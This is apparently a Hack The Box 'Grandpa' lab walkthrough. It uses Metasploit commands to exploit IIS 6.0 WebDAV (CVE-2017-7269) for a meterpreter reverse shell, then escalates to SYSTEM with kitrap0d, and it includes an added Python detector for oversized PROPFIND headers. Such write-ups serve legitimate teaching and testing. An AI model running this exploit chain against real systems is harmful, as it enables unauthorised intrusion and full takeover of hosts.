HTB: Grandpa
Hack The Box's Grandpa is an Easy-rated Windows machine exposing Microsoft IIS version 6.0, which has a remote command execution vulnerability (CVE-2017-7269). The box covers basic enumeration with Nmap, an easily obtained exploit that ships as a Metasploit module, and some basic privilege escalation.
After starting the machine on HTB and connecting to the HTB VPN, open a terminal and ping the machine's IP address to confirm the network path is up. Make sure the IP address you enter matches the one HTB displays when you boot the target machine.
ping 10.129.95.233
You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once the network is confirmed up and running, it's time to move on to enumeration with Nmap.
Start with a quick service scan using Nmap. We use the -sV switch to enable version detection. You can learn more about Nmap here.
nmap -sV 10.129.95.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:04 CDT
Nmap scan report for 10.129.95.233
Host is up (0.076s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.27 seconds
On port 80 we see Microsoft IIS version 6.0 running. After some searching on the web we find that this version has a remote command execution vulnerability, CVE-2017-7269. Let's fire up Metasploit and search for potential exploits:
msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/

       =[ metasploit v6.4.43-dev                          ]
+ -- --=[ 2483 exploits - 1279 auxiliary - 393 post       ]
+ -- --=[ 1463 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl

[msf](Jobs:0 Agents:0) >>
Option #0 is a buffer overflow in the ScStoragePathFromUrl function of the IIS 6.0 WebDAV service. You can read more about this exploit module on Rapid7's website here. Let's select it and fill out the required options:
[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     85.9.199.172     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set RHOSTS 10.129.95.233
RHOSTS => 10.129.95.233
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set LHOST 10.10.14.241
LHOST => 10.10.14.241
[msf](Jobs:0 Agents:0)
We set RHOSTS to the target IP address and LHOST to our listening IP address for the reverse TCP connection. We can now run the exploit:
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (177734 bytes) to 10.129.95.233
[*] Meterpreter session 1 opened (10.10.14.241:4444 -> 10.129.95.233:1030) at 2025-07-15 15:10:26 -0500
(Meterpreter 1)(c:\windows\system32\inetsrv) >
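From the defender's side, the exploit above is visible on the wire as a WebDAV PROPFIND whose If header is far longer than any legitimate lock token. The following Python is an added example (not from the original writeup and not Metasploit code) that flags that shape in raw HTTP requests; the 256-byte threshold and the two sample requests are constructed assumptions, not captured traffic.

```python
# Length above which an If header is treated as abnormal. Assumption: real
# WebDAV If headers carry short lock tokens and stay far below this value.
IF_HEADER_LIMIT = 256


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers-dict)."""
    head = raw.split("\r\n\r\n", 1)[0]          # drop any body
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)   # split on first colon only
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_suspicious_propfind(raw: str, limit: int = IF_HEADER_LIMIT) -> bool:
    """True for a PROPFIND with an oversized If header, the request shape
    that triggers the IIS 6.0 ScStoragePathFromUrl overflow (CVE-2017-7269)."""
    method, _path, headers = parse_request(raw)
    if method.upper() != "PROPFIND":
        return False
    return len(headers.get("if", "")) > limit


# Constructed sample requests (not captured traffic). The target address is
# the one used in the writeup above.
BENIGN = (
    "PROPFIND /docs/ HTTP/1.1\r\nHost: 10.129.95.233\r\n"
    "If: <http://10.129.95.233/docs/> (<opaquelocktoken:abc>)\r\n\r\n"
)
SUSPICIOUS = (
    "PROPFIND / HTTP/1.1\r\nHost: 10.129.95.233\r\n"
    "If: <http://10.129.95.233/" + "A" * 1200 + ">\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, is_suspicious_propfind(req))
```

Run it over requests captured by a reverse proxy or packet capture; the default IIS 6 W3C log does not record the If header, so the check needs the raw request rather than the access log.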
We now have a user-level foothold on the target machine. After some digging on the system we find that we need administrator access in order to read the user.txt flag, so some privilege escalation is required. First, let's migrate into a stable process that also runs as NT AUTHORITY\NETWORK SERVICE. After listing the running processes with ps, we switch into davcdata.exe using the migrate command.
(Meterpreter 1)(c:\windows\system32\inetsrv) > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 580   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 776   392   svchost.exe
 796   392   svchost.exe
 944   392   spoolsv.exe
 972   392   msdtc.exe
 1092  392   cisvc.exe
 1136  392   svchost.exe
 1192  392   inetinfo.exe
 1228  392   svchost.exe
 1368  392   VGAuthService.exe
 1420  392   vmtoolsd.exe
 1508  392   svchost.exe
 1608  392   svchost.exe
 1836  392   alg.exe
 1872  392   dllhost.exe
 1892  580   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2420  580   wmiprvse.exe
 3620  1508  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3692  580   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3812  3620  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

(Meterpreter 1)(c:\windows\system32\inetsrv) > migrate 3692
[*] Migrating from 3812 to 3692...
[*] Migration completed successfully.
(Meterpreter 1)(C:\WINDOWS\system32) >
After migrating, we can background this session using the background command and search for an exploit for our target system using local_exploit_suggester:
(Meterpreter 1)(C:\WINDOWS\system32) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> use post/multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set SESSION 1
SESSION => 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run
[*] 10.129.95.233 - Collecting local exploits for x86/windows...
[*] 10.129.95.233 - 202 exploit checks are being tried...
[+] 10.129.95.233 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.129.95.233 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 11  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The check raised an exception.
 13  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_comhijack                      No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 17  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 18  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 19  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
 20  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 22  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 23  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 24  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 25  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 26  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 27  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 28  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows Server 2003 (5.2 Build 3790, Service Pack 2). is not vulnerable
 29  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 30  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 31  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The check raised an exception.
 33  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 34  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 35  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 36  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 37  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 40  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 41  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 42  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >>
We receive a list of potential exploits for the target system. We will use option 1, ms10_015_kitrap0d. You can read more about this privilege escalation exploit here. Let's use this module, set our options and run it:
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     194.113.72.151   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set SESSION 1
SESSION => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set LHOST 10.10.14.241
LHOST => 10.10.14.241
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 3292 launched.
[*] Reflectively injecting the DLL into 3292...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.129.95.233
[*] Meterpreter session 2 opened (10.10.14.241:4444 -> 10.129.95.233:1031) at 2025-07-16 10:56:22 -0500
(Meterpreter 2)(C:\WINDOWS\system32) >
It looks like the exploit was successful. Let's run getuid and see who we are:
(Meterpreter 2)(C:\WINDOWS\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
You can now navigate the target system as SYSTEM and collect the user.txt and root.txt flags.